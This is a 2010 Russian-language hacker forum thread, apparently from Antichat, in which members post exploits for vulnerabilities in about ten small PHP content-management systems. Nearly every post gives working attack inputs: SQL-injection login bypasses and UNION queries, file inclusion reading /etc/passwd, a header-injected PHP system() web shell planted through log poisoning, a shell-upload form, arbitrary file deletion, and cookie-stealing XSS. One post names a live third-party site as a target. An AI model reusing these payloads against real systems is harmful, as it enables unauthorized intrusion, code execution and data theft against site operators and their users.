Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.03.2010, 18:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Siman!
Продукт SiMan CMS 1.5
скачать тут
SQL inj
index.php
PHP код:
...
$_getvars=$_GET;
$_postvars=$_POST;
$_cookievars=$_COOKIE;
$_servervars=$_SERVER;
$_uplfilevars=$_FILES;
...
PHP код:
...$module=$_getvars["m"];
$mode=$_getvars["d"];
$special['sql']['count']=0;
if (count($_getvars)==0)
$special['is_index_page']=1;
if (empty($module) || strpos($module, ':') || strpos($module, '.') || strpos($module, '/') || strpos($module, '\\'))...
PHP код:
...if ($module<>'404') include('modules/'.$module.'.php');...
/modules/account.php
PHP код:
...$modules[$modules_index]["module"]='account';
$modules[$modules_index]["title"]=$lang["register"];
$login=$_postvars["p_login"];
$password=$_postvars["p_password"];
$password2=$_postvars["p_password2"];...
PHP код:
...sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";
$result=database_db_query($nameDB, $sql, $lnkDB);
$u=0;
while ($row=database_fetch_object($result))
{
if (strcmp($row->login, $login)==0)
{
$u=1;
}
}
if ($u!=1)
{
include('ext/register.php');
}
if ($u==1)...
Условие:
mg=off
durability and result:
action="index.php?m=account&d=login" , метод post
поле login_d [SQL]
поле passwd_d
Тулим:
login_d = admin' or 1=1/*
разные вариации /*, -- # ... , просто есть beta версия CMS 
Мы внутри!
Реальный пример:
http://my-tut.org.ua/index.php?m=account&d=login
login_d admin' or 1=1 --
passwd_d безразницы!
Последний раз редактировалось Strilo4ka; 26.03.2010 в 18:47..
|
|
|
27.03.2010, 02:18
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: JaF CMS
Version: 4.0
Author: http://jaf-cms.sourceforge.net/
Remote File Inclusion
Need: register_globals = on;
File: /module/forum/main.php
PHP код:
if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php");
...
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00
and:
File: /module/forum/forum.php
PHP код:
if(!isset($csv_include))require($website.$main_dir."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php"); ?>
....
If, allow_url_include = off, use this:
Code Exec
File: online.php
PHP код:
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
echo 'f';
$ip = getenv("HTTP_X_FORWARDED_FOR");
} else {
$ip = getenv("REMOTE_ADDR");
}
...
$user_write = fopen("$log_file", "w");
fputs($user_write , $to_write );
fclose($user_write );
First step, enter you browser this url:
http://targethost.com/online.php, and send this headers:
Код:
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
X-Forwarded-For: <?php system($_GET[sec]); ?>
Ok, next step - include log-file.
Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir
Последний раз редактировалось m0Hze; 27.03.2010 в 02:21..
|
|
|
|
27.03.2010, 19:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Чесно скажу >стыдно постить< - каменный век, но все же:
Продукт netious-cms-serv-0.4
Сайт : http://www.netious.com/
SQL inj
/[путь админки указ. при установке далее -1-]/index.php
PHP код:
...$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);...
Result:
username admin ' or 1=1--
пасс любой!
Внутри
SQL inj
/index.php
PHP код:
...$saction="deny";
if ($sresult=mysql_query("SELECT Secured FROM pages WHERE PageId='$pageid'"))
{$srow=mysql_fetch_row($sresult);...
Result:
Код:
http://netious/index.php?pageid=1[SQL]
Код:
http://netious/index.php?pageid=1'+and+0+union+select+1,version(),3--+
Условия:
register_globals=on
magic_quotes=off
XSS + SQL inj
[ -1-]/addtomenuResponse.php
PHP код:
...mysql_query("INSERT into pages VALUES ('','$refid','$name','$thisdescription','$thiskeywords','$alias','0','$pagetype','','$pagesecured')")
or die("Something went wrong: <br />".mysql_error());...
include.php
PHP код:
...function commonheader($pageid,$title,$keywords,$description,$forcedid)
{
if ($pageid!="-1" && $pageid!="contact")
{
$result=mysql_query("SELECT Name, Keywords, Description FROM pages WHERE PageId='$pageid'");
$row=mysql_fetch_row($result);
$name=$row[0];
$thiskeywords=$row[1];
$thisdescription=$row[2];
if ($forcedid=="no") {$title="$name :: $title";}...
echo "
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"
\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<title>$title</title>...
Дырявый как #
Последний раз редактировалось Strilo4ka; 27.03.2010 в 20:35..
|
|
|
|
27.03.2010, 21:42
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: VarioCMS
Version: 0.5.6
Author:: http://sourceforge.net/projects/variocms/
SQL-Inj
Need: mq=off;
File: /plugins/system/slideshow/upload.php
PHP код:
if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
....
$sql_insert = "INSERT INTO " . $db_plugin_prefix . "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
fputs($logfile, "$sql_insert\n");
Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}.
Columns: 7
Upload Shell
Need: none.
File: /plugins/system/slideshow/upload.php
PHP код:
if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
..
foreach ($_FILES as $file => $fileArray) {
echo("File key: $file\n");
foreach ($fileArray as $item=>$val) {
}
//Let's manipulate the received file: in this demo, we just want to remove it!
$new_dir = $slideshow_path . $album_id;
if (file_exists($new_dir) == false) {
mkdir ($new_dir);
mkdir ($new_dir . "/fullsize");
mkdir ($new_dir . "/slideshow");
mkdir ($new_dir . "/thumbnails");
}
$upload_dir = $slideshow_path . $album_id . "/";
$position = 65000;
if (move_uploaded_file($fileArray['tmp_name'], $upload_dir . uml2nouml($fileArray['name']))) {
Target:
Expl0it ^_^:
Код:
<form enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="album_id" value="../../"/>
</form>
album_id = folder to upload shell.
|
|
|
|
28.03.2010, 14:59
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/
Local File Inclusion
File: newsreader.php
Need: rg=on;
PHP код:
include ("admin/lang/$lang");
include ("_read_config.inc.php");
include_once ("inc/cleaner.inc.php");
Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd
File: admin/blog.php
Need:logged on target site!
PHP код:
session_start();
if (!isset($_SESSION['user'])) {
echo "<h2>ACCESS DENIED AND LOGGED</h2>";
exit;
}
...
f (isset($_POST['filename'])) {
//include ("$rootdir/articles/".$_POST['filename']);
include ("../news/".$_POST['filename']);
}else{
...
Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd
Remove arbitrary file
File: admin/download_remove.php
Need: logged on target site!
PHP код:
if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) {
$file = trim($_POST['file']);
$object = ("../downloads/$file");
Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
|
|
|
|
01.04.2010, 10:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
MusicBox v3.3
SQL Injection:
/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7+--+
Пассивная XSS:
/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert (document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+ 1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E
Активная XSS:
/member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>
По идеи почти каждый параметр уязвим.
/phpinfo.php 
|
|
|
|
05.04.2010, 18:02
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Product: pepsi 0.6
download: http://sourceforge.net/projects/pepsicms/
Remote File Inclusion
file:index.php
PHP код:
//very sweet
include "includes/template-loader.php";
file:includes/template-loader.php
PHP код:
//include( 'classes/theme_engine/engine.php' );
include( $_Root_Path . 'classes/Smarty.class.php' );
result:
if allow_url_include On
Код:
/index.php?_Root_Path=http://ya.ru/%00
or
Код:
/index.php?_Root_Path=[file]%00
|
|
|
|
06.04.2010, 04:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.kcms.cz/
K:CMS v.2.1.1
LFI, плохо что в админке!
/admin.php
PHP код:
...if (isset($_GET["function"])) {
include "components/pages_admin/".$_GET["function"].".php";...
Result:
http://kcms/admin.php?function=options [lfi]
Example:
http://kcms/admin.php?function=options/../../../robots.txt |
|
|
|
06.04.2010, 06:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Бред, но напишу):
http://aphpkb.org/
Andy's PHP Knowledgebase v0.94.6 © Andy Grayndler 2010
XSS
/textarea.php
PHP код:
<?php //textarea.php -- default textarea
echo '<textarea name="' . $textareaname . '" style="width:95%; height:300px">' .
$textareacontent . '</textarea>';
?>
Условие:
rg=on
Результат:
http://site/textarea.php?textareacontent=</textarea> [xss]
http://localhost/know/textarea.php?textareacontent=</textarea><script>alert(123)</script>
И куча других скриптов. Не буду бред постить!
SQL inj
/a_authord.php - даные о пользователях!
PHP код:
...include('./functions.php');
require_once ('./config/auth.php');
require ('./config/config.php');
include"./config/dbsettings.php";
$num = $_GET[aid];
$query = "SELECT CONCAT(FirstName, ' ', LastName) AS name, UserName, Email, DATE_FORMAT(RegistrationDate, '%M %d, %Y') AS dr FROM authors WHERE AuthorID='{$num}'";...
Уловия:
- админка;
- mg=off.
Резльутат:
http://site/a_authord.php?aid=1 [sql]
http://site/a_authord.php?aid=1%27+union+select+1,version%28%2 9,3,4--+
Последний раз редактировалось Strilo4ka; 06.04.2010 в 06:59..
|
|
|
|
07.04.2010, 15:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
BlogME
Product : BlogME 1.1
SQL injection
file : index.php
mq = off
Код:
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),version(),3,4,5,6,7,8--+
Код:
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
Код:
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
PHP код:
case 'edit' :
$sqledit= "SELECT * FROM ". $prefix ."_blogroll WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_blogroll where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
Код:
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_cat WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result:
Код:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
PHP код:
sqldelete= "DELETE FROM ". $prefix ."_cat where id=$id";
$resultdelete = db_query($dbname,$sqldelete)
result :
Код:
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_links WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_links where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
Код:
http://x60unu/links.php?mode=delete&id=1[blind sql]
Active Xss
comments --- text comments --- "><script>alert();</script>
з.ы. двиг сплошная дыра 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
![Отправить сообщение для [x60]unu с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
